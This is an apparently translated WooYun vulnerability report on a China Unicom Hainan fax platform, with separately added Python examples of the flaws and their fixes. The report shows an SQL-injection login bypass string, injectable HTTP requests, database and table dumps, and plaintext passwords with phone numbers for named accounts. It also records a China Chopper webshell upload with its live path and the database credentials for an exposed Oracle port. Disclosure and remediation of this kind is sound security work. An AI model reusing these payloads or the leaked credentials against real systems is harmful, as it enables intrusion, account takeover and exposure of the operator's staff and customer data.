
Vulnerability summary

Defect ID: wooyun-2015-0132927

Title: Multiple vulnerabilities in a fax platform of China Unicom Hainan (injection, upload, etc.)

Vendor: China Unicom

Author: JulyTornado

Submitted: 2015-08-12 14:28

Fixed: 2015-09-26 15:04

Published: 2015-09-26 15:04

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-12: Details sent to the vendor; awaiting the vendor's handling
2015-08-12: CNCERT could not yet reach the responsible unit; details disclosed to the notifying body only
2015-08-22: Details disclosed to core white hats and relevant domain experts
2015-09-01: Details disclosed to regular white hats
2015-09-11: Details disclosed to intern white hats
2015-09-26: Details disclosed to the public

Brief description:

A bundle of vulnerabilities in a fax platform of China Unicom Hainan

Detailed description:

**.**.**.**/fax/login.jsp
0x01 Universal-password login (SQL injection in the login check):
Enter admin' or '1'='1 as the username with any password; the login succeeds:



0x02 SQL injection:
Information query functions, including but not limited to "Personnel Records Management > Personnel Management", are vulnerable to SQL injection:

POST /emp/jxtEmployeeRst.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**/emp/jxtEmployee.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 172
DNT: 1
Host: **.**.**.**
Pragma: no-cache
Cookie: JSESSIONID=6902EAA62E8189BC91E17DA05C7B72B3
name=dfsf&sex=&cardid=&department=&nativeplace=&email=&m_tel=&folk=&h_tel=&title=&edulevel=&birth_date=&o_tel=&instime=&opempno=&butt=&rowId=&optFlag=&hidden2=&hidden3=&id=


Parameters such as name are injectable.
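As an added illustration (not code from the report or from the platform), the following Python script reproduces the two query shapes behind 0x01 and 0x02 against an in-memory SQLite database: a login check built by string concatenation, which the username admin' or '1'='1 bypasses, and a name search of the kind the jxtEmployeeRst.jsp request drives, each beside a parameterized version. The table columns and rows are constructed; the platform's real schema is not known beyond the table names in the dump.

```python
import sqlite3

# Constructed sample rows standing in for the platform's JXT_SYSUSER and
# JXT_EMPLOYEE tables; the real schema is not known beyond the table names.
SAMPLE_USERS = [("admin", "correct-horse"), ("13322063918", "444999")]
SAMPLE_EMPLOYEES = [("dfsf",), ("Zhang San",), ("Li Si",)]


def make_db():
    """Create an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jxt_sysuser (name TEXT, passwd TEXT)")
    conn.execute("CREATE TABLE jxt_employee (name TEXT)")
    conn.executemany("INSERT INTO jxt_sysuser VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO jxt_employee VALUES (?)", SAMPLE_EMPLOYEES)
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation (the 0x01 pattern).

    A single quote in the username terminates the literal, so the OR '1'='1
    clause becomes part of the WHERE condition and the password is never
    really checked.
    """
    sql = ("SELECT name FROM jxt_sysuser WHERE name = '" + username
           + "' AND passwd = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, password):
    """Same check with bound parameters: the input is only ever compared as data."""
    sql = "SELECT name FROM jxt_sysuser WHERE name = ? AND passwd = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def search_employees_vulnerable(conn, name):
    """Name search built by concatenation (the 0x02 pattern).

    A quote in the input produces a SQL syntax error; that error is the
    signal injection scanners look for. Raises sqlite3.OperationalError.
    """
    sql = "SELECT name FROM jxt_employee WHERE name LIKE '%" + name + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_employees_hardened(conn, name):
    """Bound LIKE pattern; % and _ in the input are escaped to match literally."""
    escaped = (name.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    sql = "SELECT name FROM jxt_employee WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


def quote_breaks_vulnerable_search(conn, name="dfsf'"):
    """True if the concatenated search fails on a quoted input (a detection signal)."""
    try:
        search_employees_vulnerable(conn, name)
    except sqlite3.OperationalError:
        return True
    return False


def demo():
    """Run both query styles against the same data and return the outcomes."""
    conn = make_db()
    payload = "admin' or '1'='1"  # the username used in 0x01
    return {
        "bypass_vulnerable": login_vulnerable(conn, payload, "anything"),
        "bypass_hardened": login_hardened(conn, payload, "anything"),
        "legit_hardened": login_hardened(conn, "admin", "correct-horse"),
        "quote_breaks_vulnerable": quote_breaks_vulnerable_search(conn),
        "quote_hardened": search_employees_hardened(conn, "dfsf'"),
        "wildcard_vulnerable": search_employees_vulnerable(conn, "%"),
        "wildcard_hardened": search_employees_hardened(conn, "%"),
        "prefix_hardened": search_employees_hardened(conn, "dfs"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Run as a script it prints the eight outcomes: the concatenated login accepts the page's username with any password and the concatenated search raises on a stray quote (and returns every row for a bare %), while the parameterized versions treat the same input as literal data. The fix for the platform is the same in JDBC: a PreparedStatement with bound parameters instead of a query string assembled from request parameters.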



Tool verification result:



available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] LTJXT
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


A large amount of sensitive information can be leaked:

Database: LTJXT
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| URL_TRACE | 172615 |
| CS_DIALOUT_TEL | 52453 |
| CS_DIALOUT_DETAIL | 51752 |
| CS_DIALOUT_TASK | 47836 |
| CS_DIALOUT_OPERATE | 47754 |
| S_AFFIX | 44429 |
| JXT_TICKET | 42227 |
| JXT_DAYPAY | 36077 |
| FAX_SEND_D | 25805 |
| FAX_SEND_M | 22935 |
| FAX_SMSMSG | 22588 |
| JXT_TEAMRELA | 14579 |
| JXT_MONTHFREE | 13852 |
| TEMP_LOG | 10938 |
| JXT_WORKLOG | 6900 |
| FAX_RECEIVE | 5363 |
| FAX_RECEIVE_HIS | 3895 |
| JXT_EMPLOYEE | 3773 |
| JXT_MONTHPAY | 3769 |
| SMS_REVMSG | 2750 |
| SMS_SNDMSG_HIS | 1235 |
| JXT_GROUP_HIS | 1115 |
| SMS_MODEL | 846 |
| JXT_CUSTOMER | 619 |
| BM_TS_MSGCONTENT | 574 |
| FAX_TELNOCHECK | 539 |
| JXT_SYSUSER | 419 |
| JXT_GROUP | 368 |
| JXT_CALLINGCARD | 255 |
| JXT_PRV_ROLE | 245 |
| BM_TS_DOWN | 214 |
| JXT_SALE_MAN | 175 |
| JXT_DISTRUST | 161 |
| BM_LAWS | 160 |
| BM_ANSWER | 153 |
| LKF_WEBMAN | 134 |
| JXT_MENU | 88 |
| TEST_MENU | 88 |
| CSQ | 65 |
| SMS_SNDMSG_FAULT | 64 |
| BM_BMTS_CONTENT | 62 |
| JXT_SYSUSER_HIS | 59 |
| JXT_TEAM | 57 |
| JXT_MENU_PAN | 56 |
| JXT_MENU_TEST | 56 |
| JXT_MEMO | 54 |
| FAX_SEND_D_HIS | 48 |
| JXT_DEPARTMENT | 45 |
| JXT_SEAL | 42 |
| BM_TS_MENU | 32 |
| CS_DIALOUT_TIME | 30 |
| BM_LINK | 28 |
| SMS_D_TYPE | 28 |
| SMS_MODEL_HIS | 28 |
| JXT_RESGROUPID | 27 |
| JXT_SUBCOM | 25 |
| TMP_TICKET | 12 |
| JXT_ROLE | 9 |
| JXT_WORKFLOW | 9 |
| TEST_ROLE | 8 |
| FAX_CONTRAST_DETAIL | 7 |
| JXT_SMSTRANS | 7 |
| SMS_M_TYPE | 7 |
| SMS_MONTHRECKONING | 7 |
| SMS_SNDMSG | 7 |
| JXT_FEECODE | 4 |
| JXT_WORKCHECK | 4 |
| JXT_WORKFLOW_TYPE | 4 |
| CS_FAX_SYSTEM | 1 |
| FAX_AFFIX1 | 1 |
| JXT_GROUPID | 1 |
| JXT_SRCTEL | 1 |
| LKF_VERSION | 1 |
+---------------------+---------+


0x03 User passwords stored in plaintext:

Database: LTJXT 
Table: JXT_SYSUSER
[2 entries]
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+
| GROUPID | SUBCOMID | NAME | MTEL | EMPNO | STATE | PASSWD | SMSTAB | SYSROLE | OPEMPNO | INSTIME | CRE_EMPNO |
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+
| 10041 | 30 | 13322063918 | NULL | 13322063918 | 0 | 444999 | NULL | 01 | SMS | | SMS |
| 10042 | 30 | 13307575890 | NULL | 13307575890 | 0 | 202020 | NULL | 50 | SMS | | SMS |
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+


Table: LKF_WEBMAN
[4 entries]
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+
| SUBCOMID | SYSUSERID | SUPUSERID | FAX | NAME | ROLE | O_TEL | STATE | EMAIL | PASSWD | MOBTEL | INSTIME |
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+
| 01 | sys | NULL | NULL | | 0 | NULL | 0 | NULL | hnabc | 13322004434 | |
| 13 | qh01 | jt01 | NULL | | 1 | NULL | 0 | NULL | 123456 | 13322002698 | |
| 01 | ltsys | NULL | NULL | | 0 | NULL | 0 | NULL | UNICOM2005 | NULL | |
| 01 | cs | NULL | NULL | | 0 | 13322002325 | 0 | NULL | 123456 | 13322002325 | |
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+
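The PASSWD columns above hold the passwords verbatim, so a single injection exposes every account. As an added example (not the platform's code), the Python below shows what the column should hold instead: a salted PBKDF2-HMAC-SHA256 record that is verified in constant time, plus an audit helper that flags rows whose stored value is not such a record. The iteration count, the record format and the sample rows are assumptions.

```python
import base64
import hashlib
import hmac
import os

# PBKDF2-HMAC-SHA256 work factor. 600,000 is the figure OWASP recommends for
# SHA-256 as of 2023 (assumption; tune to the server's latency budget).
ITERATIONS = 600_000
SALT_BYTES = 16
MIN_SALT_BYTES = 8


def hash_password(password, iterations=ITERATIONS):
    """Return a self-describing record: pbkdf2_sha256$iterations$salt$digest."""
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def parse_record(stored):
    """Split a stored value into (iterations, salt, digest); None if it is not a record."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return None
    try:
        iterations = int(parts[1])
        salt = base64.b64decode(parts[2], validate=True)
        digest = base64.b64decode(parts[3], validate=True)
    except ValueError:  # int() failure or invalid base64 (binascii.Error)
        return None
    if iterations < 1 or len(salt) < MIN_SALT_BYTES or len(digest) != 32:
        return None
    return iterations, salt, digest


def verify_password(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    parsed = parse_record(stored)
    if parsed is None:
        return False
    iterations, salt, digest = parsed
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, digest)


def audit_passwd_column(rows):
    """Return the account names whose PASSWD value is not a hash record.

    rows is a list of (name, passwd) tuples as read from a table such as
    JXT_SYSUSER or LKF_WEBMAN; anything that does not parse is plaintext or
    some other unsalted form and needs a reset on next login.
    """
    return [name for name, passwd in rows if parse_record(passwd) is None]


if __name__ == "__main__":
    # Constructed rows: two plaintext entries and one properly stored one.
    rows = [
        ("sys", "plaintext-one"),
        ("qh01", "plaintext-two"),
        ("ltsys", hash_password("constructed-secret")),
    ]
    print("accounts still in plaintext:", audit_passwd_column(rows))
    print("verify ok:", verify_password("constructed-secret", rows[2][1]))
```

The record carries its own iteration count, so the work factor can be raised later and old rows re-hashed on the user's next successful login without a schema change.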


0x04 Arbitrary file upload:
Functions including, but not limited to, "Ruyi Fax (如意传真) > New Fax" accept uploads of arbitrary files:

POST /fax/FaxSend/Upload_Fax_Affix.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**/fax/FaxSend/index.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7df15b3b60cde
Accept-Encoding: gzip, deflate
Content-Length: 7992
DNT: 1
Host: **.**.**.**
……
Content-Disposition: form-data; name="upload"; filename="D:\sectools\web\caidao-20141213\Customize\fckedit.jsp"
Content-Type: text/plain




Caidao (China Chopper) webshell path:
**.**.**.**/fax/affix/2015_08_09/20150809150809045200_2501.jsp



Caidao connects successfully, which may put the internal network at risk.
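The request above shows the three things the upload handler trusted: a client-supplied Windows path ending in .jsp, a client-supplied Content-Type of text/plain, and a storage location (/fax/affix/) inside the web root where the container executes the result. The following Python is an added example, not the platform's code, of the checks a fax attachment upload should apply instead: an extension allow-list, a leading-bytes check that ignores the client's Content-Type, a random stored name, and a storage directory outside the web root. The allowed types, size limit and UPLOAD_DIR are assumptions.

```python
import os
import secrets

# Allowed attachment types for a fax upload and the bytes each must start with.
# The set is an assumption about what a fax front end needs.
ALLOWED_TYPES = {
    ".pdf": (b"%PDF-",),
    ".tif": (b"II*\x00", b"MM\x00*"),
    ".tiff": (b"II*\x00", b"MM\x00*"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
MAX_BYTES = 10 * 1024 * 1024  # assumed size limit
# Assumed storage location: a directory the servlet container does not serve,
# unlike /fax/affix/ on the page, which sits inside the web root.
UPLOAD_DIR = "/srv/fax-affix"


def client_basename(client_filename):
    """Keep only the last path component; clients may send full paths."""
    return client_filename.replace("\\", "/").rsplit("/", 1)[-1]


def validate_upload(client_filename, data):
    """Decide whether to accept an upload.

    Returns (True, stored_name) or (False, reason). The client's Content-Type
    header is deliberately not an input: the page's request sent text/plain
    for a .jsp file, so it proves nothing about the content.
    """
    base = client_basename(client_filename)
    if not base or "\x00" in base:
        return False, "invalid filename"
    ext = os.path.splitext(base.lower())[1]
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed: %r" % ext
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match the %s signature" % ext
    # The stored name is random and unrelated to the client's name, so the
    # uploader neither chooses where the file lands nor can guess its path.
    return True, secrets.token_hex(16) + ext


def storage_path(stored_name, upload_dir=UPLOAD_DIR):
    """Join the stored name onto the upload directory and refuse escapes from it."""
    path = os.path.normpath(os.path.join(upload_dir, stored_name))
    if os.path.dirname(path) != os.path.normpath(upload_dir):
        raise ValueError("path escapes upload directory")
    return path


def save_upload(client_filename, data, upload_dir=UPLOAD_DIR):
    """Validate and write the file; returns the path, or None when rejected."""
    ok, result = validate_upload(client_filename, data)
    if not ok:
        return None
    path = storage_path(result, upload_dir)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    # Constructed inputs: the page's filename with JSP-looking content, a JSP
    # renamed to .pdf, and a genuine-looking PDF header.
    print(validate_upload(r"D:\sectools\web\caidao-20141213\Customize\fckedit.jsp", b"<%@ page %>"))
    print(validate_upload("shell.pdf", b"<%@ page %>"))
    print(validate_upload("scan.PDF", b"%PDF-1.4\n%constructed"))
```

Files accepted this way are served back through a download handler that reads from UPLOAD_DIR and sets its own Content-Type, so even a file whose first bytes mimic a PDF never reaches the JSP engine.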



0x05 The Oracle database's port 1521 is exposed externally and can be connected to directly:

conn = DriverManager.getConnection("jdbc:oracle:thin:@localhost:1521:oradata", "ltjxt", "ltjxt");



Proof of vulnerability:

Further instances of the same vulnerability types are not all listed; the examples above generalize...

Remediation:

Amitabha

Copyright notice: please credit JulyTornado@WooYun (乌云) when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2015-08-12 15:03

Vendor reply:

CNVD has confirmed the described situation and has forwarded it via CNCERT to the Hainan branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet